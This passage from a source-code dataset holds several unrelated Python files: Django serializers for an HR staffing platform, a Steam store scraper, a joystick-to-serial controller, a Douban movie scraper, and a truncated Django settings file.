HrProfileCoWorkerModelSerializer(serializers.ModelSerializer):\n hrprofile_auth = ComCodeSerializer(read_only=True)\n # hrprofile_auth = serializers.Serializer('backend.ComCodeSerializer')\n hrprofile_auth_id = serializers.PrimaryKeyRelatedField(queryset=ComCode.objects.all())\n user = UserSimpleSerializer()\n # user = serializers.SerializerMethodField()\n created_time = serializers.DateTimeField(format='%Y-%m-%d', read_only=True)\n\n class Meta:\n model = HrProfileCoWorker\n fields = ['id', 'hrprofile', 'user', 'hrprofile_auth', 'coworker_phone',\n 'created_time', 'hrprofile_auth_id']\n\n def update(self, instance, validated_data):\n instance.hrprofile_auth = validated_data.get('hrprofile_auth_id')\n instance.save()\n\n return instance\n\n\nclass HrSpecialSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n hr_jikjong_top = ComCodeSerializer()\n # hr_jikjong_top = serializers.Serializer('backend.ComCodeSerializer')\n hr_jikjong_mid = ComCodeSerializer()\n # hr_jikjong_mid = serializers.Serializer('backend.serializers.ComCod11eSerializer')\n hr_jikjong_low = ComCodeSerializer(many=True)\n # hr_jikjong_low = serializers.Serializer('backend.ComCodeSerializer')\n jikjong_tax_start = serializers.CharField()\n jikjong_tax_end = serializers.CharField()\n\n\nclass HrFileSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n hr_file = serializers.FileField()\n hr_filename = serializers.CharField()\n created_time = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S')\n\n\nclass HrImageSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n hr_image = serializers.FileField()\n hr_image_filename = serializers.CharField()\n created_time = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S')\n\n\nclass HrFeeModelSerializer(serializers.ModelSerializer):\n class Meta:\n model = HrFee\n fields = '__all__'\n read_only_fields = ['hrprofile', ]\n\n\n# HR PROFILE\nclass HrProfileModelSerializer(serializers.ModelSerializer):\n class Meta:\n model = HrProfile\n fields = '__all__'\n\n user = serializers.PrimaryKeyRelatedField(many=True, read_only=True)\n # since = serializers.IntegerField(allow_null=True, required=False, initial=0)\n address = serializers.PrimaryKeyRelatedField(read_only=True)\n # cmp_manager = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), allow_null=True, required=False)\n # cmp_manager = serializers.PrimaryKeyRelatedField(read_only=True)\n company_logo = serializers.FileField(read_only=True)\n hr_coworker = HrProfileCoworkerSerializer(many=True, read_only=True)\n hrspecial = HrSpecialSerializer(many=True, read_only=True)\n hrprofile_file = HrFileSerializer(many=True, read_only=True)\n hraccountinfo = HrAccountInfoSerializer(many=True, read_only=True)\n hrprofile_image = HrImageSerializer(many=True, read_only=True)\n\n # service_address = ComCodeSerializer(many=True, read_only=True)\n # services = ComCodeSerializer(many=True, read_only=True)\n\n hrfee = HrFeeModelSerializer(many=True, allow_null=True, required=False)\n\n def create(self, validated_data):\n print('validated_data', validated_data)\n user = self.context['request'].user\n # phone = validated_data.pop('phone', {})\n address_data = validated_data.pop('service_address', {})\n service_data = validated_data.pop('services', {})\n hrfee_data = validated_data.pop('hrfee', {})\n\n custid = validated_data.get('custid', None)\n\n if custid is not None:\n if HrProfile.objects.filter(custid=custid, status_cd='CB0200000').exists():\n hrprofile = HrProfile.objects.get(custid=custid, status_cd='CB0200000')\n created = False\n else:\n hrprofile = HrProfile.objects.create(**validated_data)\n created = True\n else:\n created = True\n hrprofile = HrProfile.objects.create(**validated_data)\n\n\n if hrfee_data != {}:\n for data in hrfee_data:\n HrFee.objects.create(hrprofile=hrprofile, **data)\n\n if address_data:\n for address in address_data:\n hrprofile.service_address.add(address)\n if service_data:\n for service in service_data:\n hrprofile.services.add(service)\n\n hrprofile.user.add(user)\n\n if created: # 신규등록이면 마스터 권한\n hr_instance = HrProfileCoWorker.objects.create(\n user=user, hrprofile=hrprofile,\n # coworker_phone=manager_phone,\n hrprofile_auth=ComCode.objects.get(code_id='CG0200000')\n )\n print('신규', hr_instance)\n else: # 이미 존재하면 기본 권한\n hr_instance = HrProfileCoWorker.objects.create(\n user=user, hrprofile=hrprofile,\n # coworker_phone=manager_phone,\n hrprofile_auth=ComCode.objects.get(code_id='CG0100000'))\n print('기존', hr_instance)\n\n hr_instance.save()\n\n '''\n Slack 알람\n '''\n text = '*[신규HR기업]* [_{}_]가 등록되었습니다.'.format(hrprofile.custname)\n slack_notify(text)\n\n '''\n HR 기업프로필 등록 시 메일 발송 ( 속도때문에 1명만 가도록 )\n '''\n # admin_email_list = User.objects.filter(is_admin=True, email='admin@chaema.co.kr').values('email')\n # for email in admin_email_list:\n # email_template = 'common/hrcompany_register'\n # email_address = email['email']\n # ctx = {\n # \"user\": validated_data.get('user', None)\n # }\n # SendMail(email_template, email_address, ctx)\n\n\n '''\n 관리자들에게 알람\n '''\n # admin_list = User.objects.filter(is_admin=True).values('id')\n # for receiver in admin_list:\n # alarm = Alarm(receiver=User(id=receiver['id']),\n # alarm_gubun=ComCode(code_id='ZE0300000'),\n # title='신규 HR 기업이 등록되었습니다.',\n # contents='새로운 HR 기업을 검토해주세요.\\n\\r')\n # alarm.save()\n\n\n '''\n 신규 기업 문자 알람 \n '''\n # for receiver in admin_list:\n # obj = User.objects.get(id=receiver['id'])\n # if obj.phone:\n # infosms = InfoSms.objects.create(\n # from_number=obj.phone,\n # to_number=obj.phone,\n # contents='신규 HR 기업이 등록되었습니다.'\n # )\n # infosms.save()\n\n\n return hrprofile\n\n def update(self, instance, validated_data):\n hrfee_data = validated_data.pop('hrfee', {})\n address_data = validated_data.pop('service_address', {})\n service_data = validated_data.pop('services', {})\n\n instance.service_address.set(address_data)\n instance.services.set(service_data)\n\n print('hrfee_data:', hrfee_data)\n if hrfee_data != {}:\n HrFee.objects.filter(hrprofile=instance).delete() #삭제 후 다시 등록..\n for data in hrfee_data:\n created = HrFee.objects.update_or_create(hrprofile=instance, **data)\n\n # 알림\n next_status = validated_data.get('status_cd', None)\n if instance.status_cd != next_status:\n # 검토 -> 승인\n if next_status == ComCode.objects.get(code_id='CB0200000'):\n ''' 파견사업주 알림 '''\n for receiver in instance.user.all():\n hr_alarm = Alarm(\n receiver=receiver,\n alarm_gubun=ComCode(code_id='ZE0300000'),\n title='파견사업주 파트너로 승인되었습니다.',\n contents='파견사업주 전용 관리페이지를 활용해주세요.',\n link_url=URL_FRONT + 'Mng/dashboard/'\n )\n hr_alarm.save()\n\n file_data = self.context['request'].FILES\n\n if file_data:\n company_logo = file_data.get('company_logo')\n hrprofile_file = file_data.get('hrprofile_file')\n hrprofile_image = file_data.get('hrprofile_image')\n\n if company_logo:\n instance.company_logo = company_logo\n if hrprofile_image:\n HrImage.objects.create(hrprofile=instance, hr_image=hrprofile_image)\n # HrImage.objects.get_or_create(hrprofile=instance, hr_image=hrprofile_image)\n if hrprofile_file:\n HrFile.objects.create(hrprofile=instance, hr_file=hrprofile_file)\n instance.save()\n\n instance = super(HrProfileModelSerializer, self).update(instance, validated_data)\n return instance\n\n def to_representation(self, instance):\n # data = super(HrProfileModelSerializer, self).to_representation(instance)\n data = HrProfileSerializer(instance).data\n # todo 주석 해제시 에러\n # if data['cmp_manager']:\n # data['cmp_manager'] = UserSimpleSerializer(instance.cmp_manager).data\n # if data['status_cd']:\n # data['status_cd'] = ComCodeSerializer(instance.status_cd).data\n # if data['services']:\n # temp_array = []\n # for service in data['services']:\n # temp_array.append(ComCode.objects.filter(code_id=service).values()[0])\n # data['services'] = temp_array\n # if data['service_address']:\n # temp_array = []\n # for address in data['service_address']:\n # temp_array.append(ComCode.objects.filter(code_id=address).values()[0])\n # data['service_address'] = temp_array\n\n return data\n\n\nclass HrProfileSimpleSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n cust_gubun = ComCodeSerializer()\n custname = serializers.CharField()\n custid = serializers.CharField(required=False)\n homepage = serializers.CharField(required=False)\n telno = serializers.CharField(required=False)\n faxno = serializers.CharField(required=False)\n emp_count = serializers.CharField(allow_null=True, allow_blank=True)\n gross_total = serializers.CharField(required=False)\n manager_email = serializers.CharField(required=False)\n manager_phone = serializers.CharField(required=False)\n introduce = serializers.CharField(required=False)\n hraccountinfo = HrAccountInfoSerializer(many=True, read_only=True)\n # cmp_manager = serializers.CharField()\n cmp_manager = UserSimpleSerializer()\n company_logo = serializers.FileField()\n load_addr_code = serializers.CharField(required=False)\n load_addr = serializers.CharField(required=False)\n load_addr_detail = serializers.CharField(required=False)\n hr_bokri = serializers.CharField(required=False)\n service_address = ComCodeSerializer(many=True)\n services = ComCodeSerializer(many=True)\n is_expose = serializers.BooleanField()\n is_partners = serializers.BooleanField()\n # address = serializers.Serializer('backend.ComCodeSerializer')\n status_cd = ComCodeSerializer()\n status_reason = serializers.CharField(required=False)\n # status_cd= serializers.Serializer('backend.ComCodeSerializer')\n\nclass PartnersSerializer(HrProfileSimpleSerializer):\n hrprofile_image = HrImageSerializer(many=True)\n hrprofile_file = HrFileSerializer(many=True)\n hrspecial = HrSpecialSerializer(many=True)\n hr_sugub_reviews = SugubReviewSerializer(many=True, read_only=True)\n resume_count = serializers.IntegerField(allow_null=True)\n jobad_count = serializers.IntegerField(allow_null=True)\n is_expose = serializers.BooleanField(read_only=True)\n is_partners = serializers.BooleanField(read_only=True)\n services = ComCodeSerializer(many=True)\n\n\nclass HrFeeSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n fee_gubun = ComCodeSerializer()\n start = serializers.IntegerField()\n end = serializers.IntegerField()\n fee_start = serializers.FloatField()\n fee_end = serializers.FloatField()\n\n\nclass HrProfileSerializer(HrProfileSimpleSerializer):\n hrprofile_image = HrImageSerializer(many=True)\n hrprofile_file = HrFileSerializer(many=True)\n # hrspecial = HrSpecialSerializer(many=True)\n hr_coworker = HrProfileCoworkerSerializer(many=True)\n hr_sugub_reviews = SugubReviewSerializer(many=True, read_only=True)\n resume_count = serializers.IntegerField(allow_null=True)\n jobad_count = serializers.IntegerField(allow_null=True)\n is_expose = serializers.BooleanField(read_only=True)\n is_partners = serializers.BooleanField(read_only=True)\n hrfee = HrFeeSerializer(many=True, read_only=True)\n\n\nclass HrSpecialModelSerializer(serializers.ModelSerializer):\n class Meta:\n model = HrSpecial\n fields = '__all__'\n unique_together = (('hrprofile', 'hr_jikjong_top', 'hr_jikjong_mid'),)\n read_only_fields = ('hrprofile', )\n\n # def validate(self, attrs):\n # print('attrs:', attrs)\n # raise serializers.ValidationError(\"최대 등록 갯수 초과\")\n","sub_path":"myplatform/hr_profile/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":14420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"456198460","text":"# 引用requests库\nimport requests\n# 引用BeautifulSoup库\nfrom bs4 import BeautifulSoup\n# 正则库\nimport re\n# csv读写\nimport csv\n# 定义请求头\nimport pandas as pd\n\n# 设置cookie(绕过成人认证)\ncookie = {\"Steam_Language\": \"chinese\", \"birthtime\": \"725817601\", \"lastagecheckage\": \"1-January-1993\"}\nheaders = {\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36',\n 'Accept-Language': \"zh-CN,zh;q=0.9\"\n}\n\n# 文件路径\nfile = 'games.csv'\nsaveFile = \"indicators.csv\"\n\n\ndef getSteamUrl(file):\n list = []\n csv_reader = csv.reader(open(file, encoding='utf-8'))\n for row in csv_reader:\n list.append({\"name\": row[0], \"top\": row[1], \"url\": row[2]})\n # 去表头\n return list[1:]\n\n\ndef getGameType(data):\n type = []\n res_type = r'.*多人.*|.*合作.*|.*单人.*'\n for item in data:\n type = re.findall(res_type, str(item))\n if len(type) == 1:\n break\n if len(type) == 0:\n type = [\"其他\"]\n return type[0]\n\n\ndef isSupportChinese(data):\n support = []\n res_language = r'不支持'\n support = re.findall(res_language, str(data[1]))\n if len(support) == 0:\n return \"是\"\n return \"否\"\n\n\ndef getIndicators(data):\n list = []\n cnt = 0\n for game in data:\n cnt += 1\n print(cnt)\n name = game[\"name\"]\n steam_url = game[\"url\"]\n top = game[\"top\"]\n res_game = requests.get(steam_url, cookies=cookie, headers=headers)\n bs_game = BeautifulSoup(res_game.text, 'html.parser')\n # 内容主题/类型\n theme_list = []\n price_list = []\n res_a = r'(.*?)'\n themes_a = bs_game.find_all(\"a\", class_=\"app_tag\")\n themes = re.findall(res_a, str(themes_a), re.S)\n for item in themes:\n theme_list.append(item.strip())\n # 开发商\n dev_publisher = bs_game.find_all(\"div\", class_=\"dev_row\")\n # 有些游戏页面可能已经下线\n if len(bs_game.find_all(\"div\", class_=\"dev_row\")) < 2:\n continue\n dev = re.findall(res_a, str(dev_publisher[0]), re.S)\n # 发行商\n publisher = re.findall(res_a, str(dev_publisher[1]), re.S)\n # 收费\n price_div = bs_game.find(\"div\", class_=\"game_purchase_price price\")\n res_div = r'(.*?)
    '\n price = re.findall(res_div, str(price_div), re.S)\n for price_item in price:\n price_list.append(price_item.strip().replace(\"¥ \", \"\"))\n # 打折影响div标签, 重写匹配\n if len(price) == 0:\n price_div = bs_game.find(\"div\", class_=\"discount_original_price\")\n res_div = r'(.*?)'\n price = re.findall(res_div, str(price_div), re.S)\n for price_item in price:\n price_list.append(price_item.strip().replace(\"¥ \", \"\"))\n # 平台\n # 因为steam平台上没有手游,所以都是PC\n platform = \"PC\"\n # 性质\n # 从内容列表和网页标签里匹配\n category_div = bs_game.find_all('div', class_='game_area_details_specs')\n categorys = re.findall(res_a, str(category_div), re.S)\n category = getGameType(theme_list + categorys)\n # 是否支持中文\n language_list = bs_game.find_all('tr')\n is_support = isSupportChinese(language_list)\n\n list.append(\n {\"name\": name, \"theme\": \",\".join(theme_list), \"dev\": \",\".join(dev), \"publisher\": \",\".join(publisher),\n \"price\": \"\".join(price_list), \"platform\": platform, \"category\": category, \"is_support_chinese\": is_support,\n \"top\": top})\n writeToCsv(list)\n list.clear()\n return list\n\n\ndef writeToCsv(data):\n try:\n csv_file = open(saveFile, \"a\", newline='', encoding='utf-8')\n writer = csv.writer(csv_file)\n for game in data:\n print(game)\n writer.writerow(\n [game['name'], game['theme'], game['dev'], game['publisher'], game['price'], game['platform'],\n game['category'], game[\"is_support_chinese\"], game['top']])\n except IOError as e:\n print(e)\n\n\ncsvfile = open(saveFile, \"w\", newline='', encoding='utf-8')\nwriter = csv.writer(csvfile)\n# 表头\nwriter.writerow(('游戏名', '类型', '开发商', '发行商', '价格', '平台', '性质', '是否支持中文', '历史在线峰值'))\ncsvfile.close()\n\n\n# 所有游戏列表以及指标\n# game_list = getIndicators(getSteamUrl(file))\n# 写入csv\n\ndef main():\n # writeToCsv(game_list)\n getIndicators(getSteamUrl(file))\n\n\nif __name__ == '__main__':\n main()","sub_path":"爬取指标/getIndicators.py","file_name":"getIndicators.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"580970120","text":"import pygame\nimport serial\n\npygame.init()\npygame.joystick.init()\ndone = False\n\nPORT = \"COM5\" \n\nserial_port = serial.Serial(PORT,115200)\nserial_port.close()\nserial_port.open()\n\ncontrol = 0\nprev_control = control\nPWM = 1\nx_horizontal = 0\ny_horizontal = 0\nx_vertical = 0\ny_vertical = 0\neps = 1e-3\n\nwhile not done:\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tdone = True\n\t\n\tjoystick = pygame.joystick.Joystick(0)\n\tjoystick.init()\n\taxes = joystick.get_numaxes()\n\t\n\n\t# x_horizontal_curr = round(joystick.get_axis(0))\n\taxis0 = float(joystick.get_axis(0))\n\tif ((axis0 +1 ) < eps):\n\t\tx_horizontal_curr = 0\n\telif (axis0>-0.99 and axis0 <-0.2):\n\t\tx_horizontal_curr = 1\n\telif ((axis0 - 0) < eps):\n\t\tx_horizontal_curr = 2\n\telif (axis0>0.2 and axis0 < 0.99):\n\t\tx_horizontal_curr = 3\n\telif ((axis0 - 1)< eps):\n\t\tx_horizontal_curr = 4\n\ty_horizontal_curr = round(joystick.get_axis(1))\n\n\tx_vertical_curr = round(joystick.get_axis(3))\n\ty_vertical_curr = round(joystick.get_axis(4))\n\n\n\tcontrol_press_A = joystick.get_button(0)\n\tcontrol_press_B = joystick.get_button(1)\n\tcontrol_press_X = joystick.get_button(2)\n\tcontrol_press_Y = joystick.get_button(3)\n\tcontrol_val = control_press_A * 1 + control_press_B * 2 + control_press_X * 3 + control_press_Y * 4\n \n \n\t#PWM_L2_R2 = round(joystick.get_axis(2))\n\t#if PWM_L2_R2 < 0:\n\t#\tPWM_L2_R2 = 0\n\tPWM_L1 = joystick.get_button(4)\n\tPWM_R1 = joystick.get_button(5)\n\t#PWM_val = PWM_L2_R2 * 1 + PWM_L1 * 3 + PWM_R1 * 4\n\tPWM_val = PWM_L1 * 3 + PWM_R1 * 4\n\n\n\tif x_horizontal != x_horizontal_curr or y_horizontal != y_horizontal_curr or x_vertical != x_vertical_curr or y_vertical != y_vertical_curr or (PWM_val != PWM and PWM_val != 0) or (control_val == 0 and prev_control != 0):\n\t\tx_horizontal = x_horizontal_curr\n\t\ty_horizontal = y_horizontal_curr\n\t\tx_vertical = x_vertical_curr\n\t\ty_vertical = y_vertical_curr\n\t\tcontrol = prev_control if prev_control!= 0 else 0\n\t\tPWM = PWM_val if PWM_val != 0 else PWM\n\t\t\n\t\tvalue = str(x_horizontal) + str(y_horizontal+1) + str(x_vertical+1) + str(y_vertical+1) + str(control) + str(PWM)\n\t\tserial_port.write(value.encode())\n\t\tprint(\"VAL:\", value)\n\t\tprint(\"X_horizontal : {}\".format(str(x_horizontal).encode()))\n\t\tprint(\"Y_horizontal : {}\".format(str(y_horizontal+1).encode()))\n\t\tprint(\"X_vertical : {}\".format(str(x_vertical+1).encode()))\n\t\tprint(\"Y_vertical : {}\".format(str(y_vertical+1).encode()))\n\t\tprint(\"Control : {}\".format(str(control).encode()))\n\t\tprint(\"PWM : {}\".format(str(PWM).encode()))\n\t\t\n\tprev_control = control_val\n\npygame.quit()\n","sub_path":"joystick_analog.py","file_name":"joystick_analog.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"548590642","text":"# coding=utf-8\r\n\r\nimport re\r\nimport urllib.request\r\ntop_urls = []\r\ntop_num = 1\r\nurl = \"https://movie.douban.com/top250?start=\"\r\nfor num in range(4):\r\n top_urls.append(url + str(num * 25))\r\n\r\n\r\nfor i in top_urls:\r\n html = urllib.request.urlopen(i).read().decode('utf-8')\r\n top_tag = re.compile(r'(.*)')\r\n title = re.findall(top_tag, html)\r\n print(title)\r\n for i in title:\r\n if i.find('/') == -1:\r\n print('Top' + str(top_num) + ' ' + i)\r\n top_num += 1\r\n","sub_path":"top100.py","file_name":"top100.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"583724023","text":"\"\"\"\nDjango settings for STEPIC_STUDIO project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n\nTEMP_DIR = os.path.join(BASE_DIR, 'temp')\n\nLINUX_DIR = ''\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = ''\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\nTEMPLATE_DEBUG = False\n\nALLOWED_HOSTS = []\n\nTEST = True\n\n# Capacity warnings low borders:\nWARNING_CAPACITY = 100 * 1024 * 1024 * 1024 # 100GB\nERROR_CAPACITY = 20 * 1024 * 1024 * 1024 # 20GB\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'raven.contrib.django.raven_compat',\n 'stepicstudio',\n)\n\nMIDDLEWARE_CLASSES = (\n 'raven.contrib.django.raven_compat.middleware.SentryResponseErrorIdMiddleware',\n 'raven.contrib.django.raven_compat.middleware.Sentry404CatchMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'stepicstudio.middleware.SetStorageCapacityMiddleware',\n 'stepicstudio.middleware.SetLastVisitMiddleware',\n)\n\nROOT_URLCONF = 'STEPIC_STUDIO.urls'\n\nWSGI_APPLICATION = 'STEPIC_STUDIO.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': '',\n 'USER': '',\n 'PASSWORD': '',\n 'HOST': 'localhost',\n 'PORT': '5432',\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_ROOT = 'staticfiles'\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, 'static'),\n)\n\nTEMPLATE_DIRS = {'stepicstudio/templates/', }\n\nUBUNTU_USERNAME = ''\nUBUNTU_PASSWORD = ''\n\nREST_FRAMEWORK = {\n\n 'PAGE_SIZE': 10\n}\n\nPROFESSOR_IP = '172.25.202.32'\n\n# Adobe PremierePro configuration\nADOBE_PPRO_PATH = ''\nADOBE_PPRO_CMD = '/C es.process'\n\n# FFMPEG configuration\nFFMPEG_PATH = r'D:\\VIDEO\\ffmpeg\\bin\\ffmpeg.exe'\nFFPROBE_RUN_PATH = r'D:\\VIDEO\\ffmpeg\\bin\\ffprobe.exe'\nFFMPEG_CMD_PART = r' -y -f dshow -video_size 1920x1080 -rtbufsize 1024M -framerate 25 -i video=\"Blackmagic WDM Capture\":audio=\"Blackmagic WDM Capture\" -codec:v libx264 -preset ultrafast -crf 17 '\n\nFFMPEG_TABLET_CMD = r'ffmpeg -f alsa -ac 2 -i pulse -f x11grab -r 24 -s 1920x1080 -i :0.0 ' \\\n '-pix_fmt yuv420p -vcodec libx264 -acodec pcm_s16le -preset ultrafast -threads 0 -af \"volume=1dB\" -y '\n\nCAMERA_REENCODE_TEMPLATE = r'-y -i {0} -c copy {1}' # should reencode .TS to .mp4\n\nTABLET_REENCODE_TEMPLATE = r'-y -i {0} -c:v copy {1}' # should reencode .mkv to .mp4\n\nSILENCE_DETECT_TEMPLATE = r'-i {} -af silencedetect=n={}:d={} -f null -'\n\nVIDEO_OFFSET_TEMPLATE = r'-y -itsoffset {0} -i {1} -async 1 {2}' # 0 - duration, 1 - input file, 2 - output file\n\nRAW_CUT_TEMPLATE = r' -i {0} -i {1} -filter_complex ' \\\n '\"[0:v]setpts=PTS-STARTPTS, pad=iw*2:ih[bg]; ' \\\n '[1:v]setpts=PTS-STARTPTS[fg]; [bg][fg]overlay=w; ' \\\n 'amerge,pan=stereo:c0